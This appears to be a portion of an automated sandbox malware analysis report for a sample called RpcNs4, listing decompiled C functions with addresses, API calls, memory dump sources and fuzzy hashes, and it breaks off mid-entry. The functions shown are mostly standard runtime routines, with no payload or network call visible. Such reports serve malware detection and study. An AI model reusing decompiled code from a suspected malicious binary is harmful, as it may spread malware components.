                                                                                                      0x020b1642
                                                                                                      0x020b1637
                                                                                                      0x00000000
                                                                                                      0x020b1751
                                                                                                      0x020b1751
                                                                                                      0x020b1751
                                                                                                      0x020b176a
                                                                                                      0x00000000
                                                                                                      0x020b176a
                                                                                                      0x020b12e8

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.257541494.00000000020B1000.00000020.00000001.sdmp, Offset: 020B0000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.257535197.00000000020B0000.00000004.00000001.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.257576055.00000000020BD000.00000004.00000001.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_20b0000_RpcNs4.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: _snwprintf
                                                                                                      • String ID: /T1$G+ $G+
                                                                                                      • API String ID: 3988819677-2345689787
                                                                                                      • Opcode ID: 7457a2de186d4c4e0c8e4528e9f944a33bd4f7eb74e8acd5551305681c996801
                                                                                                      • Instruction ID: 4e791b6d304ca05a1d9f7a0d9a26517fd9083ac88184ebd205f0006823c530ac
                                                                                                      • Opcode Fuzzy Hash: 7457a2de186d4c4e0c8e4528e9f944a33bd4f7eb74e8acd5551305681c996801
                                                                                                      • Instruction Fuzzy Hash: 3AD19075A083068BC736DF64C4A0AEEF7E6AF84304F544A1EE899D7340DB34E915DB82
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 100%
                                                                                                      			E0040F24B() {
                                                                                                      				intOrPtr _t3;
                                                                                                      				intOrPtr _t4;
                                                                                                      				void* _t6;
                                                                                                      				intOrPtr _t9;
                                                                                                      				void* _t12;
                                                                                                      				intOrPtr _t13;
                                                                                                      
                                                                                                      				_t3 =  *0x438b20; // 0x200
                                                                                                      				_t13 = 0x14;
                                                                                                      				if(_t3 != 0) {
                                                                                                      					if(_t3 < _t13) {
                                                                                                      						_t3 = _t13;
                                                                                                      						goto L4;
                                                                                                      					}
                                                                                                      				} else {
                                                                                                      					_t3 = 0x200;
                                                                                                      					L4:
                                                                                                      					 *0x438b20 = _t3;
                                                                                                      				}
                                                                                                      				_t4 = E0040CFF1(_t3, 4);
                                                                                                      				 *0x438b1c = _t4;
                                                                                                      				if(_t4 != 0) {
                                                                                                      					L8:
                                                                                                      					_t12 = 0;
                                                                                                      					_t9 = 0x435ae0;
                                                                                                      					while(1) {
                                                                                                      						 *((intOrPtr*)(_t12 + _t4)) = _t9;
                                                                                                      						_t9 = _t9 + 0x20;
                                                                                                      						_t12 = _t12 + 4;
                                                                                                      						if(_t9 >= 0x435d60) {
                                                                                                      							break;
                                                                                                      						}
                                                                                                      						_t4 =  *0x438b1c; // 0x6287d8
                                                                                                      					}
                                                                                                      					return 0;
                                                                                                      				} else {
                                                                                                      					 *0x438b20 = _t13;
                                                                                                      					_t4 = E0040CFF1(_t13, 4);
                                                                                                      					 *0x438b1c = _t4;
                                                                                                      					if(_t4 != 0) {
                                                                                                      						goto L8;
                                                                                                      					} else {
                                                                                                      						_t6 = 0x1a;
                                                                                                      						return _t6;
                                                                                                      					}
                                                                                                      				}
                                                                                                      			}









                                                                                                      0x0040f24b
                                                                                                      0x0040f253
                                                                                                      0x0040f256
                                                                                                      0x0040f261
                                                                                                      0x0040f263
                                                                                                      0x00000000
                                                                                                      0x0040f263
                                                                                                      0x0040f258
                                                                                                      0x0040f258
                                                                                                      0x0040f265
                                                                                                      0x0040f265
                                                                                                      0x0040f265
                                                                                                      0x0040f26d
                                                                                                      0x0040f272
                                                                                                      0x0040f27b
                                                                                                      0x0040f29b
                                                                                                      0x0040f29b
                                                                                                      0x0040f29d
                                                                                                      0x0040f2a2
                                                                                                      0x0040f2a2
                                                                                                      0x0040f2a5
                                                                                                      0x0040f2a8
                                                                                                      0x0040f2b1
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x0040f2b3
                                                                                                      0x0040f2b3
                                                                                                      0x0040f2bd
                                                                                                      0x0040f27d
                                                                                                      0x0040f280
                                                                                                      0x0040f286
                                                                                                      0x0040f28b
                                                                                                      0x0040f294
                                                                                                      0x00000000
                                                                                                      0x0040f296
                                                                                                      0x0040f298
                                                                                                      0x0040f29a
                                                                                                      0x0040f29a
                                                                                                      0x0040f294

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.256448974.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.256423838.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256635443.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256647032.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256660274.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256692564.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_RpcNs4.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __calloc_crt
                                                                                                      • String ID: `]C$wC
                                                                                                      • API String ID: 3494438863-808437571
                                                                                                      • Opcode ID: 484377b076df00fabd8c2a1fccc8f7f648e9a1d09ed7ea333a479461580e79bd
                                                                                                      • Instruction ID: 72d7284f8e9fd5ec6db6b3b88fa14804601b3eb64e61d0091f2518a1533ae0a5
                                                                                                      • Opcode Fuzzy Hash: 484377b076df00fabd8c2a1fccc8f7f648e9a1d09ed7ea333a479461580e79bd
                                                                                                      • Instruction Fuzzy Hash: 65F02DB53087038AF7349B59BC61A52A395E748720F00807FF100EA6C0D73C9843878C
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 89%
                                                                                                      			E00402524(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                                                      				char* _v16;
                                                                                                      				char _v28;
                                                                                                      				signed char _v32;
                                                                                                      				void* _t10;
                                                                                                      				void* _t19;
                                                                                                      				intOrPtr* _t22;
                                                                                                      				void* _t24;
                                                                                                      				void* _t25;
                                                                                                      				intOrPtr* _t27;
                                                                                                      
                                                                                                      				_t25 = __edi;
                                                                                                      				_t19 = __ebx;
                                                                                                      				while(1) {
                                                                                                      					_t10 = E004025D7(_t19, _t24, _t25, _a4);
                                                                                                      					if(_t10 != 0) {
                                                                                                      						break;
                                                                                                      					}
                                                                                                      					if(E004036E7(_t10, _a4) == 0) {
                                                                                                      						_push(1);
                                                                                                      						_v16 = "bad allocation";
                                                                                                      						_t22 =  &_v28;
                                                                                                      						E004034F3(_t22,  &_v16);
                                                                                                      						_v28 = 0x42cdd4;
                                                                                                      						E0040371A( &_v28, 0x4341d8);
                                                                                                      						asm("int3");
                                                                                                      						_t27 = _t22;
                                                                                                      						 *_t27 = 0x42cdd4;
                                                                                                      						E00403563(_t22);
                                                                                                      						if((_v32 & 0x00000001) != 0) {
                                                                                                      							E004023FA(_t27);
                                                                                                      						}
                                                                                                      						return _t27;
                                                                                                      					} else {
                                                                                                      						continue;
                                                                                                      					}
                                                                                                      					L7:
                                                                                                      				}
                                                                                                      				return _t10;
                                                                                                      				goto L7;
                                                                                                      			}












                                                                                                      0x00402524
                                                                                                      0x00402524
                                                                                                      0x00402539
                                                                                                      0x0040253c
                                                                                                      0x00402544
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00402537
                                                                                                      0x0040254a
                                                                                                      0x0040254f
                                                                                                      0x00402557
                                                                                                      0x0040255a
                                                                                                      0x00402567
                                                                                                      0x0040256f
                                                                                                      0x00402574
                                                                                                      0x00402579
                                                                                                      0x0040257b
                                                                                                      0x00402581
                                                                                                      0x0040258a
                                                                                                      0x0040258d
                                                                                                      0x00402592
                                                                                                      0x00402597
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00402537
                                                                                                      0x00402549
                                                                                                      0x00000000

                                                                                                      APIs
                                                                                                      • _malloc.LIBCMT ref: 0040253C
                                                                                                        • Part of subcall function 004025D7: __FF_MSGBANNER.LIBCMT ref: 004025EE
                                                                                                        • Part of subcall function 004025D7: __NMSG_WRITE.LIBCMT ref: 004025F5
                                                                                                        • Part of subcall function 004025D7: RtlAllocateHeap.NTDLL(00610000,00000000,00000001,00000000,00000000,00000000,?,0040D04F,00000000,00000000,00000000,00000000,?,00406E45,00000018,00434500), ref: 0040261A
                                                                                                      • std::exception::exception.LIBCMT ref: 0040255A
                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040256F
                                                                                                        • Part of subcall function 0040371A: RaiseException.KERNEL32(?,?,?,004341D8,?,00000000,?,?,?,00402574,?,004341D8,?,00000001), ref: 0040376F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.256448974.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.256423838.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256635443.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256647032.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256660274.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256692564.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_RpcNs4.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                      • String ID: bad allocation
                                                                                                      • API String ID: 3074076210-2104205924
                                                                                                      • Opcode ID: a3d21fe86276208f817dbcb78276c6e3ae1468de7613c1dcd0239201df3327a7
                                                                                                      • Instruction ID: 5cc741f056d4a3ad692e710aafeaad04cb18d0bca015c19945315737f035ef5c
                                                                                                      • Opcode Fuzzy Hash: a3d21fe86276208f817dbcb78276c6e3ae1468de7613c1dcd0239201df3327a7
                                                                                                      • Instruction Fuzzy Hash: ABF0F47150021976CB00AE69ED199EEBFACAF01315F10447BFC04B26D1DFF99B40929C
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 100%
                                                                                                      			E004154D3(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                      				char _v8;
                                                                                                      				intOrPtr _v12;
                                                                                                      				int _v20;
                                                                                                      				int _t35;
                                                                                                      				int _t38;
                                                                                                      				int _t42;
                                                                                                      				intOrPtr* _t44;
                                                                                                      				int _t47;
                                                                                                      				short* _t49;
                                                                                                      				intOrPtr _t50;
                                                                                                      				intOrPtr _t54;
                                                                                                      				int _t55;
                                                                                                      				int _t59;
                                                                                                      				char* _t62;
                                                                                                      
                                                                                                      				_t62 = _a8;
                                                                                                      				if(_t62 == 0) {
                                                                                                      					L5:
                                                                                                      					return 0;
                                                                                                      				}
                                                                                                      				_t50 = _a12;
                                                                                                      				if(_t50 == 0) {
                                                                                                      					goto L5;
                                                                                                      				}
                                                                                                      				if( *_t62 != 0) {
                                                                                                      					E0040D9B1( &_v20, _a16);
                                                                                                      					_t35 = _v20;
                                                                                                      					__eflags =  *(_t35 + 0xa8);
                                                                                                      					if( *(_t35 + 0xa8) != 0) {
                                                                                                      						_t38 = E004150F5( *_t62 & 0x000000ff,  &_v20);
                                                                                                      						__eflags = _t38;
                                                                                                      						if(_t38 == 0) {
                                                                                                      							__eflags = _a4;
                                                                                                      							_t59 = 1;
                                                                                                      							_t42 = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                                      							__eflags = _t42;
                                                                                                      							if(_t42 != 0) {
                                                                                                      								L21:
                                                                                                      								__eflags = _v8;
                                                                                                      								if(_v8 != 0) {
                                                                                                      									_t54 = _v12;
                                                                                                      									_t31 = _t54 + 0x70;
                                                                                                      									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                                      									__eflags =  *_t31;
                                                                                                      								}
                                                                                                      								return _t59;
                                                                                                      							}
                                                                                                      							L20:
                                                                                                      							_t44 = E00403FAC();
                                                                                                      							_t59 = _t59 | 0xffffffff;
                                                                                                      							__eflags = _t59;
                                                                                                      							 *_t44 = 0x2a;
                                                                                                      							goto L21;
                                                                                                      						}
                                                                                                      						_t59 = _v20;
                                                                                                      						__eflags =  *(_t59 + 0x74) - 1;
                                                                                                      						if( *(_t59 + 0x74) <= 1) {
                                                                                                      							L15:
                                                                                                      							__eflags = _t50 -  *(_t59 + 0x74);
                                                                                                      							L16:
                                                                                                      							if(__eflags < 0) {
                                                                                                      								goto L20;
                                                                                                      							}
                                                                                                      							__eflags = _t62[1];
                                                                                                      							if(_t62[1] == 0) {
                                                                                                      								goto L20;
                                                                                                      							}
                                                                                                      							L18:
                                                                                                      							_t59 =  *(_t59 + 0x74);
                                                                                                      							goto L21;
                                                                                                      						}
                                                                                                      						__eflags = _t50 -  *(_t59 + 0x74);
                                                                                                      						if(__eflags < 0) {
                                                                                                      							goto L16;
                                                                                                      						}
                                                                                                      						__eflags = _a4;
                                                                                                      						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
                                                                                                      						_t59 = _v20;
                                                                                                      						__eflags = _t47;
                                                                                                      						if(_t47 != 0) {
                                                                                                      							goto L18;
                                                                                                      						}
                                                                                                      						goto L15;
                                                                                                      					}
                                                                                                      					_t55 = _a4;
                                                                                                      					__eflags = _t55;
                                                                                                      					if(_t55 != 0) {
                                                                                                      						 *_t55 =  *_t62 & 0x000000ff;
                                                                                                      					}
                                                                                                      					_t59 = 1;
                                                                                                      					goto L21;
                                                                                                      				}
                                                                                                      				_t49 = _a4;
                                                                                                      				if(_t49 != 0) {
                                                                                                      					 *_t49 = 0;
                                                                                                      				}
                                                                                                      				goto L5;
                                                                                                      			}

















                                                                                                      0x004154db
                                                                                                      0x004154e0
                                                                                                      0x004154fa
                                                                                                      0x00000000
                                                                                                      0x004154fa
                                                                                                      0x004154e2
                                                                                                      0x004154e7
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x004154ec
                                                                                                      0x00415509
                                                                                                      0x0041550e
                                                                                                      0x00415511
                                                                                                      0x00415518
                                                                                                      0x00415537
                                                                                                      0x0041553e
                                                                                                      0x00415540
                                                                                                      0x00415584
                                                                                                      0x00415593
                                                                                                      0x0041559b
                                                                                                      0x004155a1
                                                                                                      0x004155a3
                                                                                                      0x004155b3
                                                                                                      0x004155b3
                                                                                                      0x004155b7
                                                                                                      0x004155b9
                                                                                                      0x004155bc
                                                                                                      0x004155bc
                                                                                                      0x004155bc
                                                                                                      0x004155bc
                                                                                                      0x00000000
                                                                                                      0x004155c2
                                                                                                      0x004155a5
                                                                                                      0x004155a5
                                                                                                      0x004155aa
                                                                                                      0x004155aa
                                                                                                      0x004155ad
                                                                                                      0x00000000
                                                                                                      0x004155ad
                                                                                                      0x00415542
                                                                                                      0x00415545
                                                                                                      0x00415549
                                                                                                      0x00415572
                                                                                                      0x00415572
                                                                                                      0x00415575
                                                                                                      0x00415575
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00415577
                                                                                                      0x0041557b
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x0041557d
                                                                                                      0x0041557d
                                                                                                      0x00000000
                                                                                                      0x0041557d
                                                                                                      0x0041554b
                                                                                                      0x0041554e
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00415552
                                                                                                      0x00415565
                                                                                                      0x0041556b
                                                                                                      0x0041556e
                                                                                                      0x00415570
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00415570
                                                                                                      0x0041551a
                                                                                                      0x0041551d
                                                                                                      0x0041551f
                                                                                                      0x00415524
                                                                                                      0x00415524
                                                                                                      0x00415529
                                                                                                      0x00000000
                                                                                                      0x00415529
                                                                                                      0x004154ee
                                                                                                      0x004154f3
                                                                                                      0x004154f7
                                                                                                      0x004154f7
                                                                                                      0x00000000

                                                                                                      APIs
                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00415509
                                                                                                      • __isleadbyte_l.LIBCMT ref: 00415537
                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 00415565
                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 0041559B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.256448974.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.256423838.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256635443.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256647032.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256660274.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256692564.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_RpcNs4.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                      • String ID:
                                                                                                      • API String ID: 3058430110-0
                                                                                                      • Opcode ID: 3710f688a2b214f1cf60e7ff4e19daede13986bfed869f9c0a6359568c9f5529
                                                                                                      • Instruction ID: 478774b0f7d39393cd8bf266ab152c9b1bceb49f68e4d9ca76d912dad007dec8
                                                                                                      • Opcode Fuzzy Hash: 3710f688a2b214f1cf60e7ff4e19daede13986bfed869f9c0a6359568c9f5529
                                                                                                      • Instruction Fuzzy Hash: 9331C031600A46FFDB218E69C845BEB7BA7FF81310F15402AE86597291E734E891DB98
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 100%
                                                                                                      			E00401260(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                      				struct tagPOINT _v12;
                                                                                                      				long _t12;
                                                                                                      				int _t20;
                                                                                                      				long _t22;
                                                                                                      
                                                                                                      				_t12 = GetWindowLongA(_a4, 0xffffffeb);
                                                                                                      				_t20 = _a8;
                                                                                                      				_t22 = _t12;
                                                                                                      				if(_t20 == 0x14) {
                                                                                                      					L6:
                                                                                                      					L00401005(_t22);
                                                                                                      					goto L7;
                                                                                                      				} else {
                                                                                                      					if(_t20 == 0x113) {
                                                                                                      						if(_a12 == 0x4b0) {
                                                                                                      							goto L6;
                                                                                                      						}
                                                                                                      						L7:
                                                                                                      						return 0;
                                                                                                      					} else {
                                                                                                      						if(_t20 == 0x205) {
                                                                                                      							GetCursorPos( &_v12);
                                                                                                      							TrackPopupMenu( *(_t22 + 0xc), 0, _v12, _v12.y, 0x64,  *(_t22 + 0x14), 0);
                                                                                                      							return 0;
                                                                                                      						} else {
                                                                                                      							return DefWindowProcA(_a4, _t20, _a12, _a16);
                                                                                                      						}
                                                                                                      					}
                                                                                                      				}
                                                                                                      			}







                                                                                                      0x0040126c
                                                                                                      0x00401272
                                                                                                      0x00401275
                                                                                                      0x0040127a
                                                                                                      0x004012d7
                                                                                                      0x004012d9
                                                                                                      0x00000000
                                                                                                      0x0040127c
                                                                                                      0x00401282
                                                                                                      0x004012d5
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x004012de
                                                                                                      0x004012e4
                                                                                                      0x00401284
                                                                                                      0x0040128a
                                                                                                      0x004012a7
                                                                                                      0x004012bf
                                                                                                      0x004012cb
                                                                                                      0x0040128c
                                                                                                      0x004012a0
                                                                                                      0x004012a0
                                                                                                      0x0040128a
                                                                                                      0x00401282

                                                                                                      APIs
                                                                                                      • GetWindowLongA.USER32 ref: 0040126C
                                                                                                      • DefWindowProcA.USER32(?,?,?,?), ref: 00401296
                                                                                                      • GetCursorPos.USER32(?), ref: 004012A7
                                                                                                      • TrackPopupMenu.USER32(?,00000000,?,?,00000064,?,00000000), ref: 004012BF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.256448974.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.256423838.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256635443.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256647032.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256660274.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256692564.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_RpcNs4.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$CursorLongMenuPopupProcTrack
                                                                                                      • String ID:
                                                                                                      • API String ID: 1794703793-0
                                                                                                      • Opcode ID: d5af5e9bbd54771d4f90c30ccf96748d4a38a08e97c498cb83b3451f644df746
                                                                                                      • Instruction ID: e542749ba296fdd87e3a5beb6a412bebb88910c97f6c43a1d3d2113e5c2dfe96
                                                                                                      • Opcode Fuzzy Hash: d5af5e9bbd54771d4f90c30ccf96748d4a38a08e97c498cb83b3451f644df746
                                                                                                      • Instruction Fuzzy Hash: B201753250410CBBDF259F94EC09AEF7B65EB04311F0046AAFE02A55F0D7B65960DB95
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 100%
                                                                                                      			E0041C101(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                      				intOrPtr _t25;
                                                                                                      				void* _t26;
                                                                                                      
                                                                                                      				_t25 = _a16;
                                                                                                      				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                                                      					_t26 = E0041C670(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                      					goto L9;
                                                                                                      				} else {
                                                                                                      					_t34 = _t25 - 0x66;
                                                                                                      					if(_t25 != 0x66) {
                                                                                                      						__eflags = _t25 - 0x61;
                                                                                                      						if(_t25 == 0x61) {
                                                                                                      							L7:
                                                                                                      							_t26 = E0041C1A5(_a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                      						} else {
                                                                                                      							__eflags = _t25 - 0x41;
                                                                                                      							if(__eflags == 0) {
                                                                                                      								goto L7;
                                                                                                      							} else {
                                                                                                      								_t26 = E0041C924(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                      							}
                                                                                                      						}
                                                                                                      						L9:
                                                                                                      						return _t26;
                                                                                                      					} else {
                                                                                                      						return E0041C845(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
                                                                                                      					}
                                                                                                      				}
                                                                                                      			}





                                                                                                      0x0041c104
                                                                                                      0x0041c10a
                                                                                                      0x0041c17d
                                                                                                      0x00000000
                                                                                                      0x0041c111
                                                                                                      0x0041c111
                                                                                                      0x0041c114
                                                                                                      0x0041c12f
                                                                                                      0x0041c132
                                                                                                      0x0041c152
                                                                                                      0x0041c164
                                                                                                      0x0041c134
                                                                                                      0x0041c134
                                                                                                      0x0041c137
                                                                                                      0x00000000
                                                                                                      0x0041c139
                                                                                                      0x0041c14b
                                                                                                      0x0041c14b
                                                                                                      0x0041c137
                                                                                                      0x0041c182
                                                                                                      0x0041c186
                                                                                                      0x0041c116
                                                                                                      0x0041c12e
                                                                                                      0x0041c12e
                                                                                                      0x0041c114

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.256448974.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.256423838.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256635443.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256647032.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256660274.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256692564.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_RpcNs4.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                      • String ID:
                                                                                                      • API String ID: 3016257755-0
                                                                                                      • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                      • Instruction ID: 9e2707e79c112db0bd1b87ffd3fb653869e533c69894d3168685ae0c76429fca
                                                                                                      • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                      • Instruction Fuzzy Hash: D4014E7608014ABBCF125E84CC81CEE3F62BB19354B588516FE1858132C23AC9B2AF85
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 85%
                                                                                                      			E0041349B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                      				intOrPtr* _t24;
                                                                                                      				void* _t28;
                                                                                                      				intOrPtr* _t40;
                                                                                                      				void* _t41;
                                                                                                      
                                                                                                      				_push(0xc);
                                                                                                      				_push(0x434708);
                                                                                                      				E00406830(__ebx, __edi, __esi);
                                                                                                      				_t28 = E00404224();
                                                                                                      				_t40 = E0040CFF1(8, 1);
                                                                                                      				 *((intOrPtr*)(_t41 - 0x1c)) = _t40;
                                                                                                      				if(_t40 != 0) {
                                                                                                      					E0040E856(_t28, __edx, 1, _t40, __eflags);
                                                                                                      					E0040DCE3(_t28, __edx, 1, _t40, __eflags);
                                                                                                      					 *_t40 =  *((intOrPtr*)(_t28 + 0x6c));
                                                                                                      					 *((intOrPtr*)(_t40 + 4)) =  *((intOrPtr*)(_t28 + 0x68));
                                                                                                      					E00406D5B(0xc);
                                                                                                      					 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                                                                                      					E0040E5C7( *_t40);
                                                                                                      					 *(_t41 - 4) = 0xfffffffe;
                                                                                                      					E00413B6A();
                                                                                                      					E00406D5B(0xd);
                                                                                                      					 *(_t41 - 4) = 1;
                                                                                                      					asm("lock xadd [eax], edi");
                                                                                                      					__eflags = 2;
                                                                                                      					 *(_t41 - 4) = 0xfffffffe;
                                                                                                      					E00413B76();
                                                                                                      					_t24 = _t40;
                                                                                                      				} else {
                                                                                                      					 *((intOrPtr*)(E00403FAC())) = 0xc;
                                                                                                      					_t24 = 0;
                                                                                                      				}
                                                                                                      				return E00406875(_t24);
                                                                                                      			}







                                                                                                      0x00413ad0
                                                                                                      0x00413ad2
                                                                                                      0x00413ad7
                                                                                                      0x00413ae1
                                                                                                      0x00413af0
                                                                                                      0x00413af2
                                                                                                      0x00413af7
                                                                                                      0x00413b08
                                                                                                      0x00413b0d
                                                                                                      0x00413b15
                                                                                                      0x00413b1a
                                                                                                      0x00413b1f
                                                                                                      0x00413b25
                                                                                                      0x00413b2b
                                                                                                      0x00413b31
                                                                                                      0x00413b38
                                                                                                      0x00413b3f
                                                                                                      0x00413b45
                                                                                                      0x00413b4b
                                                                                                      0x00413b4f
                                                                                                      0x00413b50
                                                                                                      0x00413b57
                                                                                                      0x00413b5c
                                                                                                      0x00413af9
                                                                                                      0x00413afe
                                                                                                      0x00413b04
                                                                                                      0x00413b04
                                                                                                      0x00413b63

                                                                                                      APIs
                                                                                                        • Part of subcall function 00404224: __getptd_noexit.LIBCMT ref: 00404225
                                                                                                        • Part of subcall function 00404224: __amsg_exit.LIBCMT ref: 00404232
                                                                                                      • __calloc_crt.LIBCMT ref: 00413AE9
                                                                                                        • Part of subcall function 0040CFF1: __calloc_impl.LIBCMT ref: 0040D000
                                                                                                      • __lock.LIBCMT ref: 00413B1F
                                                                                                      • ___addlocaleref.LIBCMT ref: 00413B2B
                                                                                                      • __lock.LIBCMT ref: 00413B3F
                                                                                                        • Part of subcall function 00403FAC: __getptd_noexit.LIBCMT ref: 00403FAC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.256448974.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.256423838.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256635443.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256647032.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256660274.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256692564.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_RpcNs4.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                                                                                      • String ID:
                                                                                                      • API String ID: 2580527540-0
                                                                                                      • Opcode ID: 48566344ed146de0b8674f4dbf59565948250181c04cde4cea3d311e08d734ea
